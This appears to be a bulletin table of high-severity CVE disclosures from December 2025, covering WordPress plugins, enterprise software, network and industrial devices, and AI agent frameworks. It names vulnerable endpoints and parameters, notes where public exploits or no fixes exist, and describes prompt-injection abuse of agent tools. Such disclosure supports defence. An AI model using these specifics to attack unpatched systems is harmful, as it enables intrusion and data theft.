| Ivanti--Endpoint Manager | Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required. | 2025-12-09 | 9.6 | CVE-2025-10573 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| rupok98--URL Shortener Plugin For WordPress | The URL Shortener Plugin For WordPress plugin for WordPress is vulnerable to SQL Injection via the 'analytic_id' parameter in all versions up to, and including, 3.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 9.8 | CVE-2025-10738 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b4acf11-114a-4e97-89cd-1d387f14a730?source=cve https://plugins.trac.wordpress.org/browser/exact-links/trunk/app/Models/LinkAnalytics.php?rev=3210852 https://wordpress.org/plugins/exact-links/ |
| Personal Project--Panilux | Cross-Site Request Forgery (CSRF) vulnerability in Personal Project Panilux allows Cross Site Request Forgery. This CSRF vulnerability resulting in Command Injection has been identified. This issue affects Panilux: before v.0.10.0. NOTE: The vendor was contacted and responded that they deny ownership of the mentioned product. | 2025-12-09 | 9.6 | CVE-2025-11022 | https://www.usom.gov.tr/bildirim/tr-25-0433 |
| recorp--Export WP Pages to HTML & PDF Simply Create a Static Website | The Export WP Page to Static HTML & PDF plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.4 through publicly exposed cookies.txt files containing authentication cookies. This makes it possible for unauthenticated attackers to access cookies that may have been injected into the log file if the site administrator triggered a back-up using a specific user role like 'administrator.' | 2025-12-13 | 9.8 | CVE-2025-11693 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cd28ac3c-aaef-49e3-843d-8532404703c9?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3388166%40export-wp-page-to-static-html&new=3388166%40export-wp-page-to-static-html&sfp_email=&sfph_mail= |
| TalentSoft Software--UNIS | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TalentSoft Software UNIS allows SQL Injection. This issue affects UNIS: before 42321. | 2025-12-09 | 9.8 | CVE-2025-12504 | https://www.usom.gov.tr/bildirim/tr-25-0435 |
| lazycoders--LazyTasks Project & Task Management with Collaboration, Kanban and Gantt Chart | The LazyTasks - Project & Task Management with Collaboration, Kanban and Gantt Chart plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.2.29. This is due to the plugin not properly validating a user's identity via the 'wp-json/lazytasks/api/v1/user/role/edit/' REST API endpoint prior to updating their details like email address. This makes it possible for unauthenticated attackers to change arbitrary users' email addresses, including administrators', and leverage that to reset the user's password and gain access to their account. It is also possible for attackers to abuse this endpoint to grant users access to additional roles within the plugin. | 2025-12-12 | 9.8 | CVE-2025-12963 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c6998185-0f9b-48ab-9dca-05adf5ae603a?source=cve https://wordpress.org/plugins/lazytasks-project-task-management/ |
| D-Link--DCS-F5614-L1 | A malicious actor can access camera configuration information, including account credentials, without authenticating when accessing a vulnerable URL. | 2025-12-10 | 9.4 | CVE-2025-13607 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-343-03 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-343-03.json |
| Elated Themes--Elated Membership | The Elated Membership plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 1.2. This is due to the plugin not properly logging in a user with the data that was previously verified through the 'eltdf_membership_check_facebook_user' and the 'eltdf_membership_login_user_from_social_network' function. This makes it possible for unauthenticated attackers to log in as administrative users, as long as they have an existing account on the site which can easily be created by default through the temp user functionality, and access to the administrative user's email. | 2025-12-10 | 9.8 | CVE-2025-13613 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f15dbce4-2e94-4735-b62b-e32d923c51ce?source=cve https://themeforest.net/item/esmarts-a-modern-education-and-lms-theme/20987760 |
| ApusTheme--WP CarDealer | The WP CarDealer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.2.16. This is due to the 'WP_CarDealer_User::process_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. | 2025-12-11 | 9.8 | CVE-2025-13764 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4893d9c-e039-43df-80b9-dbe42374caed?source=cve https://themeforest.net/item/boxcar-automotive-car-dealer-wordpress-theme/49741717 |
| pgadmin.org--pgAdmin 4 | pgAdmin versions up to 9.10 are affected by a Remote Code Execution (RCE) vulnerability that occurs when running in server mode and performing restores from PLAIN-format dump files. This issue allows attackers to inject and execute arbitrary commands on the server hosting pgAdmin, posing a critical risk to the integrity and security of the database management system and underlying data. | 2025-12-11 | 9.1 | CVE-2025-13780 | https://github.com/pgadmin-org/pgadmin4/issues/9368 |
| ConnectWise--ScreenConnect | In versions of ScreenConnect™ prior to 25.8, server-side validation and integrity checks within the extension subsystem could allow the installation and execution of untrusted or arbitrary extensions by authorized or administrative users. Abuse of this behavior could result in the execution of custom code on the server or unauthorized access to application configuration data. This issue affects only the ScreenConnect server component; host and guest clients are not impacted. ScreenConnect 25.8 introduces enhanced server-side configuration handling and integrity checks to ensure only trusted extensions can be installed. | 2025-12-11 | 9.1 | CVE-2025-14265 | https://www.connectwise.com/company/trust/security-bulletins/screenconnect-2025.8-security-patch |
| sh1zen--Multi Uploader for Gravity Forms | The Multi Uploader for Gravity Forms plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'plupload_ajax_delete_file' function in all versions up to, and including, 1.1.7. This makes it possible for unauthenticated attackers to delete arbitrary files on the server. | 2025-12-12 | 9.8 | CVE-2025-14344 | https://www.wordfence.com/threat-intel/vulnerabilities/id/346af237-0411-4cc4-9544-eab697385a2f?source=cve https://plugins.trac.wordpress.org/browser/gf-multi-uploader/tags/1.1.7/inc/GFMUHandlePluploader.class.php?marks=41-43#L41 |
| jayarsiech--JAY Login & Register | The JAY Login & Register plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.4.01. This is due to incorrect authentication checking in the 'jay_login_register_process_switch_back' function with the 'jay_login_register_process_switch_back' cookie value. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id. | 2025-12-13 | 9.8 | CVE-2025-14440 | https://www.wordfence.com/threat-intel/vulnerabilities/id/928877a6-eeeb-4ed5-900b-9b1560e1bf87?source=cve https://plugins.trac.wordpress.org/browser/jay-login-register/tags/2.4.01/includes/jay-login-register-user-switching.php#L98 |
| UTT--512W | A vulnerability was determined in UTT 进取 512W up to 3.1.7.7-171114. This impacts the function strcpy of the file /goform/formNatStaticMap of the component Endpoint. Executing manipulation of the argument NatBind can lead to buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 9.8 | CVE-2025-14534 | VDB-335873; UTT 进取 512W Endpoint formNatStaticMap strcpy buffer overflow VDB-335873; CTI Indicators (IOB, IOC, IOA) Submit #703620; UTT / 艾泰 Aggressive 512W <= v3.1.7.7-171114 Buffer Overflow / Memory Corruption https://github.com/maximdevere/CVE2/issues/6 |
| UTT-- 512W | A vulnerability was identified in UTT 进取 512W up to 3.1.7.7-171114. Affected is the function strcpy of the file /goform/formConfigFastDirectionW. The manipulation of the argument ssid leads to buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-11 | 9.8 | CVE-2025-14535 | VDB-335874 | UTT 进取 512W formConfigFastDirectionW strcpy buffer overflow VDB-335874 | CTI Indicators (IOB, IOC, IOA) Submit #703621 | UTT / 艾泰 Aggressive 512W <= v3.1.7.7-171114 Buffer Overflow / Memory Corruption https://github.com/maximdevere/CVE2/issues/7 |
| Tenda--WH450 | A security flaw has been discovered in Tenda WH450 1.0.0.18. Impacted is an unknown function of the file /goform/DhcpListClient of the component HTTP Request Handler. The manipulation of the argument page results in stack-based buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be exploited. | 2025-12-14 | 9.8 | CVE-2025-14665 | VDB-336397 | Tenda WH450 HTTP Request DhcpListClient stack-based overflow VDB-336397 | CTI Indicators (IOB, IOC, IOA) Submit #714400 | Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/DhcpListClient/DhcpListClient.md https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/DhcpListClient/DhcpListClient.md#reproduce https://www.tenda.com.cn/ |
| Infinera--MTC-9 | Remote shell service (RSH) in Infinera MTC-9 version R22.1.1.0275 allows an attacker to utilize password-less user accounts and obtain system access by activating a reverse shell. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 9.8 | CVE-2025-27019 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-27019 |
| Infinera--MTC-9 | Improper configuration of the SSH service in Infinera MTC-9 allows an unauthenticated attacker to execute arbitrary commands and access data on the file system. This issue affects MTC-9: from R22.1.1.0275 before R23.0. | 2025-12-08 | 9.8 | CVE-2025-27020 | https://www.cvcn.gov.it/cvcn/cve/CVE-2025-27020 |
| WAGO--Industrial-Managed-Switches | An unauthenticated remote attacker can abuse unsafe sscanf calls within the check_account() function to write arbitrary data into fixed-size stack buffers, which leads to full device compromise. | 2025-12-10 | 9.8 | CVE-2025-41730 | https://certvde.com/de/advisories/VDE-2025-095 |
| WAGO--Industrial-Managed-Switches | An unauthenticated remote attacker can abuse unsafe sscanf calls within the check_cookie() function to write arbitrary data into fixed-size stack buffers, which leads to full device compromise. | 2025-12-10 | 9.8 | CVE-2025-41732 | https://certvde.com/de/advisories/VDE-2025-095 |
| SAP_SE--SAP Solution Manager | Due to missing input sanitization, SAP Solution Manager allows an authenticated attacker to insert malicious code when calling a remote-enabled function module. This could provide the attacker with full control of the system, leading to high impact on the confidentiality, integrity and availability of the system. | 2025-12-09 | 9.9 | CVE-2025-42880 | https://me.sap.com/notes/3685270 https://url.sap/sapsecuritypatchday |
| SAP_SE--SAP jConnect - SDK for ASE | Under certain conditions, a high privileged user could exploit a deserialization vulnerability in SAP jConnect to launch remote code execution. The system may be vulnerable when specially crafted input is used to exploit the vulnerability resulting in high impact on confidentiality, integrity and availability of the system. | 2025-12-09 | 9.1 | CVE-2025-42928 | https://me.sap.com/notes/3685286 https://url.sap/sapsecuritypatchday |
| Fortinet--FortiSwitchManager | An improper verification of cryptographic signature vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2.0 through 7.2.11, FortiOS 7.0.0 through 7.0.17, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4.0 through 7.4.10, FortiProxy 7.2.0 through 7.2.14, FortiProxy 7.0.0 through 7.0.21, FortiSwitchManager 7.2.0 through 7.2.6, FortiSwitchManager 7.0.0 through 7.0.5 allows an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | 2025-12-09 | 9.1 | CVE-2025-59718 | https://fortiguard.fortinet.com/psirt/FG-IR-25-647 |
| Fortinet--FortiWeb | An improper verification of cryptographic signature vulnerability in Fortinet FortiWeb 8.0.0, FortiWeb 7.6.0 through 7.6.4, FortiWeb 7.4.0 through 7.4.9 may allow an unauthenticated attacker to bypass the FortiCloud SSO login authentication via a crafted SAML response message. | 2025-12-09 | 9.1 | CVE-2025-59719 | https://fortiguard.fortinet.com/psirt/FG-IR-25-647 |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Unrestricted Upload of File with Dangerous Type vulnerability that could lead to arbitrary code execution by a high privileged attacker. Exploitation of this issue does not require user interaction and scope is changed. | 2025-12-09 | 9.1 | CVE-2025-61808 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--ColdFusion | ColdFusion versions 2025.4, 2023.16, 2021.22 and earlier are affected by an Improper Input Validation vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read and write access. Exploitation of this issue does not require user interaction and scope is unchanged. | 2025-12-09 | 9.1 | CVE-2025-61809 | https://helpx.adobe.com/security/products/coldfusion/apsb25-105.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page. | 2025-12-10 | 9.3 | CVE-2025-64537 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page. | 2025-12-10 | 9.3 | CVE-2025-64538 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| Adobe--Adobe Experience Manager | Adobe Experience Manager versions 6.5.23 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could lead to arbitrary code execution. An attacker could exploit this vulnerability by injecting malicious scripts into a web page that are executed in the context of the victim's browser. A successful attacker can abuse this to achieve session takeover, increasing the confidentiality and integrity impact as high. Exploitation of this issue requires user interaction in that a victim must visit a crafted malicious page. | 2025-12-10 | 9.3 | CVE-2025-64539 | https://helpx.adobe.com/security/products/experience-manager/apsb25-115.html |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. This entry covers the case when Tag is 3. | 2025-12-11 | 9.8 | CVE-2025-66043 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. This entry covers the case when Tag is 64. | 2025-12-11 | 9.8 | CVE-2025-66044 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. This entry covers the case when Tag is 65. | 2025-12-11 | 9.8 | CVE-2025-66045 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. This entry covers the case when Tag is 67. | 2025-12-11 | 9.8 | CVE-2025-66046 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. This entry covers the case when Tag is 131. | 2025-12-11 | 9.8 | CVE-2025-66047 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| The Biosig Project--libbiosig | Several stack-based buffer overflow vulnerabilities exist in the MFER parsing functionality of The Biosig Project libbiosig 3.9.1. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger these vulnerabilities. This entry covers the case when Tag is 133. | 2025-12-11 | 9.8 | CVE-2025-66048 | https://talosintelligence.com/vulnerability_reports/TALOS-2025-2296 |
| ThinkInAIXYZ--deepchat | DeepChat is an open-source AI chat platform that supports cloud models and LLMs. Versions 0.5.1 and below are vulnerable to XSS attacks through improperly sanitized Mermaid content. The recent security patch for MermaidArtifact.vue is insufficient and can be bypassed using unquoted HTML attributes combined with HTML entity encoding. Remote Code Execution is possible on the victim's machine via the electron.ipcRenderer interface, bypassing the regex filter intended to strip dangerous attributes. There is no fix at time of publication. | 2025-12-09 | 9.7 | CVE-2025-66481 | https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-h9f5-7hhf-fqm4 |
| vitejs--vite-plugin-react | @vitejs/plugin-rsc provides React Server Components (RSC) support for Vite. Versions 0.5.5 and below are vulnerable to arbitrary remote code execution on the development server through unsafe dynamic imports in server function APIs (loadServerAction, decodeReply, decodeAction) when integrated into RSC applications that expose server function endpoints. Attackers with network access to the development server can read/modify files, exfiltrate sensitive data (source code, environment variables, credentials), or pivot to other internal services. While this affects development servers only, the risk increases when using vite --host to expose the server on all network interfaces. This issue is fixed in version 0.5.6. | 2025-12-09 | 9.8 | CVE-2025-67489 | https://github.com/vitejs/vite-plugin-react/security/advisories/GHSA-j76j-5p5g-9wfr https://github.com/vitejs/vite-plugin-react/commit/fe634b58210d0a4a146a7faae56cd71af3bb9af4 |
| zitadel--zitadel | ZITADEL is an open-source identity infrastructure tool. Versions 4.7.0 and below are vulnerable to an unauthenticated, full-read SSRF vulnerability. The ZITADEL Login UI (V2) treats the x-zitadel-forward-host header as a trusted fallback for all deployments, including self-hosted instances. This allows an unauthenticated attacker to force the server to make HTTP requests to arbitrary domains, such as internal addresses, and read the responses, enabling data exfiltration and bypassing network-segmentation controls. This issue is fixed in version 4.7.1. | 2025-12-09 | 9.3 | CVE-2025-67494 | https://github.com/zitadel/zitadel/security/advisories/GHSA-7wfc-4796-gmg5 https://github.com/zitadel/zitadel/commit/4c879b47334e01d4fcab921ac1b44eda39acdb96 |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. Versions 1.6.4 and below use function GenerateRandomPassword() to create passwords using PHP's rand(). rand() is not cryptographically secure, which allows password sequences to be predicted or brute-forced. This can lead to user account compromise or privilege escalation if these passwords are used for new accounts or password resets. The vulnerability is fixed in version 1.6.5. | 2025-12-09 | 9.1 | CVE-2025-67504 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-76gj-pmvx-jcc6 https://github.com/WBCE/WBCE_CMS/commit/5d59fe021a5c6e469b1bf192b72ca652e54278f6 https://cwe.mitre.org/data/definitions/338.html https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.5 |
| pipeshub-ai--pipeshub-ai | PipesHub is a fully extensible workplace AI platform for enterprise search and workflow automation. Versions prior to 0.1.0-beta expose POST /api/v1/record/buffer/convert through missing authentication. The endpoint accepts a file upload and converts it to PDF via LibreOffice by uploading payload to os.path.join(tmpdir, file.filename) without normalizing the filename. An attacker can submit a crafted filename containing ../ sequences to write arbitrary files anywhere the service account has permission, enabling remote file overwrite or planting malicious code. This issue is fixed in version 0.1.0-beta. | 2025-12-10 | 9.8 | CVE-2025-67506 | https://github.com/pipeshub-ai/pipeshub-ai/security/advisories/GHSA-w398-9m55-2357 https://github.com/pipeshub-ai/pipeshub-ai/commit/987ebab40a1fc39956730ed93220f7f9b2c4e5f8 |
| neuron-core--neuron-ai | Neuron is a PHP framework for creating and orchestrating AI Agents. In versions 2.8.11 and below, the MySQLWriteTool executes arbitrary SQL provided by the caller using PDO::prepare() + execute() without semantic restrictions. This is consistent with the name ("write tool"), but in an LLM/agent context it becomes a high-risk capability: prompt injection or indirect prompt manipulation can cause execution of destructive queries such as DROP TABLE, TRUNCATE, DELETE, ALTER, or privilege-related statements (subject to DB permissions). Deployments that expose an agent with MySQLWriteTool enabled to untrusted input and/or run the tool with a DB user that has broad privileges are impacted. This issue is fixed in version 2.8.12. | 2025-12-10 | 9.4 | CVE-2025-67510 | https://github.com/neuron-core/neuron-ai/security/advisories/GHSA-898v-775g-777c https://github.com/neuron-core/neuron-ai/commit/44bab85d92bf162898ee48d0bcef6ba0d29b59c9 https://github.com/neuron-core/neuron-ai/releases/tag/2.8.12 |
| aliasrobotics--cai | Cybersecurity AI (CAI) is an open-source framework for building and deploying AI-powered offensive and defensive automation. Versions 0.5.9 and below are vulnerable to Command Injection through the run_ssh_command_with_credentials() function, which is available to AI agents. Only the password and command inputs are escaped in run_ssh_command_with_credentials to prevent shell injection, while the username, host and port values are injectable. This issue does not have a fix at the time of publication. | 2025-12-10 | 9.7 | CVE-2025-67511 | https://github.com/aliasrobotics/cai/security/advisories/GHSA-4c65-9gqf-4w8h https://github.com/aliasrobotics/cai/commit/09ccb6e0baccf56c40e6cb429c698750843a999c https://www.hacktivesecurity.com/blog/2025/12/10/cve-2025-67511-tricking-a-security-ai-agent-into-pwning-itself |
| ShaneIsrael--fireshare | Fireshare facilitates self-hosted media and link sharing. Versions 1.2.30 and below allow an authenticated user, or unauthenticated user if the Public Uploads setting is enabled, to craft a malicious filename when uploading a video file. The malicious filename is then concatenated directly into a shell command, which can be used for uploading files to arbitrary directories via path traversal, or executing system commands for Remote Code Execution (RCE). This issue is fixed in version 1.3.0. | 2025-12-12 | 9.8 | CVE-2025-67728 | https://github.com/ShaneIsrael/fireshare/security/advisories/GHSA-c4f5-g622-q72m https://github.com/ShaneIsrael/fireshare/commit/157386c85f6683f89192dae52115069b435b6d34 |
| JBL--LIVE PRO 2 TWS | Due to improper BLE security configurations on the device's GATT server, an adjacent unauthenticated attacker can read and write device control commands through the mobile app service, which could render the device unusable. | 2025-12-10 | 8.8 | CVE-2024-2104 | https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0001.json https://certvde.com/en/advisories/VDE-2024-076 |
| Siemens--RUGGEDCOM ROX II family | A vulnerability has been identified in RUGGEDCOM ROX II family (All versions < V2.17.0). The DHCP Server configuration file of the affected products is subject to code injection. An attacker could leverage this vulnerability to spawn a reverse shell and gain root access on the affected system. | 2025-12-09 | 8.8 | CVE-2024-56835 | https://cert-portal.siemens.com/productcert/html/ssa-912274.html |
| wondercms--WonderCMS | WonderCMS 4.3.2 contains a cross-site scripting vulnerability that allows attackers to inject malicious JavaScript through the module installation endpoint. Attackers can craft a specially designed XSS payload to install a reverse shell module and execute remote commands by tricking an authenticated administrator into accessing a malicious link. | 2025-12-12 | 8.8 | CVE-2024-58305 | ExploitDB-51805 WonderCMS Github Repository WonderCMS Homepage VulnCheck Advisory: WonderCMS 4.3.2 Cross-Site Scripting Remote Code Execution via Module Installation |
| ATCOM Technology co., LTD.--100M IP Phones | Atcom 100M IP Phones firmware version 2.7.x.x contains an authenticated command injection vulnerability in the web configuration CGI script that allows attackers to execute arbitrary system commands. Attackers can inject shell commands through the 'cmd' parameter in web_cgi_main.cgi, enabling remote code execution with administrative credentials. | 2025-12-12 | 8.8 | CVE-2024-58314 | ExploitDB-51742 Atcom IP Phone Webpage VulnCheck Advisory: Atcom 2.7.x.x Authenticated Command Injection via Web Configuration CGI |
| Insyde Software--InsydeH2O | An unchecked output buffer may allow arbitrary code execution in SMM and potentially result in SMM memory corruption. | 2025-12-12 | 8.2 | CVE-2025-10451 | https://www.insyde.com/security-pledge/sa-2025009/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.11 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have, under certain circumstances, allowed an unauthenticated user to perform unauthorized actions on behalf of another user by injecting malicious external scripts into the Swagger UI. | 2025-12-11 | 8 | CVE-2025-12029 | GitLab Issue #577975 HackerOne Bug Bounty Report #3317485 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.4 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that, under certain conditions, could have allowed an authenticated user to perform unauthorized actions on behalf of another user by creating wiki pages with malicious content. | 2025-12-11 | 8.7 | CVE-2025-12716 | GitLab Issue #579548 HackerOne Bug Bounty Report #3405832 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| tharkun69--Player Leaderboard | The Player Leaderboard plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.0.2 via the 'player_leaderboard' shortcode. This is due to the plugin using an unsanitized user-supplied value from the shortcode's 'mode' attribute in a call to include() without proper path validation. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve full remote code execution if combined with file upload capabilities. | 2025-12-12 | 8.8 | CVE-2025-12824 | https://www.wordfence.com/threat-intel/vulnerabilities/id/527f8f08-bab3-4319-99bf-845c8b378c19?source=cve https://plugins.trac.wordpress.org/browser/player-leaderboard/trunk/public/class-player-leaderboard-public.php#L1419 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3416129%40player-leaderboard&new=3416129%40player-leaderboard |
| Dassault Systèmes--ENOVIA Collaborative Industry Innovator | A reflected Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in the user's browser session. | 2025-12-08 | 8.7 | CVE-2025-12956 | https://www.3ds.com/trust-center/security/security-advisories/cve-2025-12956 |
| infility--Infility Global | The Infility Global plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation and capability checks in all versions up to, and including, 2.14.23. This is due to the `upload_file` function in the `infility_import_file` class only validating the MIME type which can be easily spoofed, and the `import_data` function missing capability checks. This makes it possible for authenticated attackers, with subscriber level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-12 | 8.8 | CVE-2025-12968 | https://www.wordfence.com/threat-intel/vulnerabilities/id/542a18f6-9d17-4e54-85e1-e01630ca371e?source=cve https://wordpress.org/plugins/infility-global/ |
| wp3d--WP3D Model Import Viewer | The WP3D Model Import Viewer plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the handle_import_file() function in all versions up to, and including, 1.0.7. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-13 | 8.8 | CVE-2025-13094 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3144f190-232c-40c0-9e4b-d1cedfe52b26?source=cve https://wordpress.org/plugins/wp3d-model-import-block/ |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to change the password of another user without prior knowledge of that password. | 2025-12-11 | 8.1 | CVE-2025-13148 | https://www.ibm.com/support/pages/node/7254434 |
| blazethemes--Blaze Demo Importer | The Blaze Demo Importer plugin for WordPress is vulnerable to unauthorized database resets and file deletion due to a missing capability check on the "blaze_demo_importer_install_demo" function in all versions up to, and including, 1.0.13. This makes it possible for authenticated attackers, with subscriber level access and above, to reset the database by truncating all tables (except options, usermeta, and users), delete all sidebar widgets, theme modifications, and content of the uploads folder. | 2025-12-12 | 8.1 | CVE-2025-13334 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d83cd6a0-d69c-4e6c-b76f-00c398b5f7e6?source=cve https://plugins.trac.wordpress.org/browser/blaze-demo-importer/tags/1.0.13/blaze-demo-importer.php?marks=67-89#L68 |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 could allow an authenticated user to execute arbitrary commands with elevated privileges on the system due to improper validation of user supplied input. | 2025-12-11 | 8.8 | CVE-2025-13481 | https://www.ibm.com/support/pages/node/7254434 |
| Nebim Neyir Computer Industry and Services Inc.--Nebim V3 ERP | Execution with Unnecessary Privileges vulnerability in Nebim Neyir Computer Industry and Services Inc. Nebim V3 ERP allows Expanding Control over the Operating System from the Database. This issue affects Nebim V3 ERP: from 2.0.59 before 3.0.1. | 2025-12-12 | 8.8 | CVE-2025-13506 | https://www.usom.gov.tr/bildirim/tr-25-0450 |
| Ivanti--Endpoint Manager | Improper control of dynamically managed code resources in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote, unauthenticated attacker to write arbitrary files on the server, potentially leading to remote code execution. User interaction is required. | 2025-12-09 | 8.8 | CVE-2025-13659 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| OpenPLC_V3--OpenPLC_V3 | OpenPLC_V3 is vulnerable to a cross-site request forgery (CSRF) attack due to the absence of proper CSRF validation. This issue allows an unauthenticated attacker to trick a logged-in administrator into visiting a maliciously crafted link, potentially enabling unauthorized modification of PLC settings or the upload of malicious programs which could lead to significant disruption or damage to connected systems. | 2025-12-13 | 8 | CVE-2025-13970 | https://github.com/thiagoralves/OpenPLC_v3 https://www.cisa.gov/news-events/ics-advisories/icsa-25-345-10 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-345-10.json |
